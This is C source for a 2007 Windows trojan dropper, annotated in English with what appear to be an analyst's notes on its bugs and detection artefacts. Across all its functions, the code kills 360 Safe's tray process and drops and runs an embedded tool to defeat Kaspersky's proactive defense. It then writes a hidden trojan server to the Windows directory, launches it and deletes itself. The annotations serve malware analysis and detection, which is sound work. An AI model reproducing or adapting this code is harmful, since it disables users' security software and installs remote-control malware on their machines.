// // // // // // // // // // // // // // // // // // // // //
// Pass卡吧主动防御,360监控工具(Server) //
// //
// 感谢之前帮助过我的朋友.......... //
// //
// 联系方式: 当前版本:Beta1.0 //
// QQ:4159175 作者:小鱼(Xfish) //
// 邮箱:ciwoyibai@vip.163.com 完成日期:2007年12月31日//
// // // // // // // // // // // // // // // // // // // // //
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) // hide the console window: GUI subsystem with the CRT entry point
#pragma comment(linker,"/ENTRY:main /FILEALIGN:0x600 /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078") // shrink the binary: merge .data/.rdata into .text and mark that section writable+executable; this second /ENTRY overrides the one above. Analyst note: a single EWR code section is a static indicator of such minimised samples, and it presumably leaves string literals in writable memory (relevant to the strcat onto a literal in DelMe) — confirm against the built PE.
#include <windows.h>
#include <stdio.h>
#include "resource.h"
//---------------------------------------------------------------------------------------------
// Kaspersky proactive-defense bypass step.
// Extracts the embedded resource IDR_EXE1 (type "EXE"), writes it to
// %WINDIR%\DEBUG.EXE, launches it hidden through "cmd.exe /c", waits 18 s,
// then terminates it with "taskkill /im DEBUG.EXE /F" via %COMSPEC%.
// Defects visible in this function (documented, not fixed):
//  - HRMem is only assigned when FindResource succeeds, yet LockResource(HRMem)
//    and SizeofResource(NULL, HRavp) run unconditionally, so a missing resource
//    reads an uninitialized handle / passes NULL.
//  - `cmd` is sized exactly to its initializer ("cmd.exe /c " plus NUL); the
//    strcat(cmd, path) below overruns that stack buffer.
//  - GetWindowsDirectory, CreateFile, WriteFile and GetEnvironmentVariable
//    results are not checked; on failure `path` / `Buffer` are used uninitialized
//    and WriteFile may be given INVALID_HANDLE_VALUE.
// Detection/IR artefacts: creation of DEBUG.EXE in the Windows directory, a hidden
// cmd.exe child launching it, and a forced taskkill of the same image ~18 s later.
void Passavp()// kill Kaspersky's proactive defense
{
HRSRC HRavp;
HGLOBAL HRMem;
DWORD HRSize,WriteSize;
LPVOID HRMlock;
HANDLE Hfile;
HRavp=FindResource(NULL, MAKEINTRESOURCE(IDR_EXE1), "EXE");
if (HRavp != NULL)HRMem=LoadResource(NULL, HRavp);
HRSize=SizeofResource(NULL, HRavp);
HRMlock=LockResource(HRMem);
if (HRMlock != NULL)
{
char path[256];
char cmd[]="cmd.exe /c "; // exactly 12 bytes: no room for the strcat below
GetWindowsDirectory(path, 256);
strcat(path, "\\DEBUG.EXE");
Hfile = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
WriteFile(Hfile, HRMlock, HRSize, &WriteSize, NULL);
CloseHandle(Hfile);
strcat(cmd,path); // stack buffer overflow: cmd holds only its initializer
WinExec(cmd,SW_HIDE);// run the dropped AVP tool; author notes this one was the hardest: every other launch method was flagged by Kaspersky, so it is started from a DOS shell
Sleep(18000);
char Buffer[MAX_PATH];
GetEnvironmentVariable("COMSPEC", Buffer, MAX_PATH);
ShellExecute(NULL, "open", Buffer, "/c taskkill /im DEBUG.EXE /F", NULL, SW_HIDE);// end the dropped process
Sleep(80);
}
return;
}
//----------------------------------------------------------------------------------------------
// 360 Safe bypass step.
// Checks for the product's presence via HKLM\SOFTWARE\360Safe and, if the key
// opens, runs "%COMSPEC% /c taskkill /im 360tray.exe" hidden to end its tray
// process. The registry handle is never closed (no RegCloseKey), and the
// GetEnvironmentVariable result is unchecked, so an unset COMSPEC would leave
// Buffer uninitialized when passed to ShellExecute.
// Detection artefact: a hidden cmd.exe running taskkill against 360tray.exe.
void Pass360() // kill 360 Safe
{
char Buffer[MAX_PATH];
HKEY Reg360;
if (RegOpenKey(HKEY_LOCAL_MACHINE, "SOFTWARE\\360Safe", &Reg360)==0)
{
GetEnvironmentVariable("COMSPEC", Buffer, MAX_PATH);// full path of the command interpreter
ShellExecute(NULL, "open", Buffer, "/c taskkill /im 360tray.exe", NULL, SW_HIDE);
}
return;
}
//-----------------------------------------------------------------------------------------------
// Payload drop: extracts the embedded resource IDR_EXE2 (type "EXE"), writes it
// to %WINDIR%\RunMgr.EXE and launches it hidden. This is the trojan "server"
// the file header refers to.
// Same unchecked-result pattern as Passavp: HRMServer is uninitialized if
// FindResource fails but is still passed to LockResource; SizeofResource gets a
// possibly-NULL handle; GetWindowsDirectory, CreateFile and WriteFile results
// are ignored.
// Detection artefact: creation and execution of RunMgr.EXE in the Windows directory.
void PassServer() // run the trojan server
{
HRSRC HRServer;
HGLOBAL HRMServer;
DWORD HSersize,WriteSersize;
LPVOID HRpoint;
HANDLE Serfile;
HRServer=FindResource(NULL,MAKEINTRESOURCE(IDR_EXE2),"EXE");
if (HRServer != NULL)HRMServer=LoadResource(NULL,HRServer);
HSersize=SizeofResource(NULL,HRServer);
HRpoint=LockResource(HRMServer);
if (HRpoint != NULL)
{
char Wpath[256];
GetWindowsDirectory(Wpath,256);
strcat(Wpath, "\\RunMgr.EXE");
Serfile=CreateFile(Wpath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
WriteFile(Serfile, HRpoint, HSersize, &WriteSersize, NULL);
CloseHandle(Serfile);
ShellExecute(NULL, "open", Wpath, NULL, NULL, SW_HIDE);
}
return ;
}
//-------------------------------------------------------------------------------------------
// Dispatch: if either HKLM\SOFTWARE\KasperskyLab or HKLM\SOFTWARE\Rising opens,
// run the AV-bypass step (Passavp) before dropping the payload (PassServer);
// otherwise drop the payload directly. Always returns true, and main() ignores
// the value. Both registry handles leak (no RegCloseKey).
BOOL Run1()
{
HKEY RegAvp;
HKEY RegRising;
if ((RegOpenKey(HKEY_LOCAL_MACHINE, "SOFTWARE\\KasperskyLab",&RegAvp)==0)
||(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Rising", &RegRising)==0))
{
Passavp();
Sleep(60);
PassServer();
}
else
{
PassServer();
}
return true;
}
//--------------------------------------------------------------------------------------------
// Self-cleanup. First attempts to delete %WINDIR%\Debug.exe through
// "cmd.exe /c del", then spawns "%COMSPEC% /c del <short path of this exe> > nul"
// hidden, drops that cmd process to IDLE_PRIORITY_CLASS and raises the current
// process/thread to REALTIME / TIME_CRITICAL so the delete is expected to run
// only once this process has exited.
// Defects visible here (documented, not fixed):
//  - DElCMD points at a string literal and strcat appends to it: writing into a
//    string literal is undefined behaviour, and the append overruns the
//    literal's storage in any case (the EWR .text linker flag at the top of the
//    file presumably kept this from faulting for the author — confirm).
//  - szParams is MAX_PATH bytes but receives "/c del " + a MAX_PATH path +
//    " > nul", so it can overflow.
//  - GetWindowsDirectory, GetModuleFileName, GetShortPathName and
//    GetEnvironmentVariable results are unchecked; sei.hProcess is never closed.
// Detection artefacts: a hidden cmd.exe whose parent has exited, deleting the
// parent's image, plus a "del" of Debug.exe in the Windows directory.
void DelMe()
{
char DELPATH[MAX_PATH];
GetWindowsDirectory(DELPATH,MAX_PATH);
strcat(DELPATH, "\\Debug.exe");
char *DElCMD="cmd.exe /c del "; // string literal — not a writable buffer
strcat(DElCMD, DELPATH); // UB: appends into the literal
WinExec(DElCMD, SW_HIDE);
SHELLEXECUTEINFO sei;// shell-execute descriptor for the self-delete command
char szModule [MAX_PATH],szComspec[MAX_PATH],szParams [MAX_PATH];
GetModuleFileName(0, szModule, MAX_PATH);
GetShortPathName(szModule, szModule, MAX_PATH);
GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH);
// Build the command-line arguments.
strcpy(szParams,"/c del ");
strcat(szParams, szModule);
strcat(szParams, " > nul");
// Fill in the structure members.
sei.cbSize = sizeof(sei);
sei.hwnd = 0;
sei.lpVerb = "Open";
sei.lpFile = szComspec;
sei.lpParameters = szParams;
sei.lpDirectory = 0;
sei.nShow = SW_HIDE;
sei.fMask = SEE_MASK_NOCLOSEPROCESS;
if(ShellExecuteEx(&sei))
{
// Run the cmd process at idle priority so it executes last and deletes this file after exit.
SetPriorityClass(sei.hProcess,IDLE_PRIORITY_CLASS);
SetPriorityClass(GetCurrentProcess(),REALTIME_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_TIME_CRITICAL);
}
return ;
}
//------------------------------------------------------------------------------------
// Entry point (the linker pragmas above hide the window and select main).
// Sequence: end the 360 tray process, run the AV check and payload drop
// (Run1's BOOL result is discarded), then schedule self-deletion.
int main()
{
Pass360();
Run1();
DelMe();
return 0;
}
//程序很简单,此程序是偶用vc编写的第一个程序,所以程序代码等方面难免很乱,请多多包涵!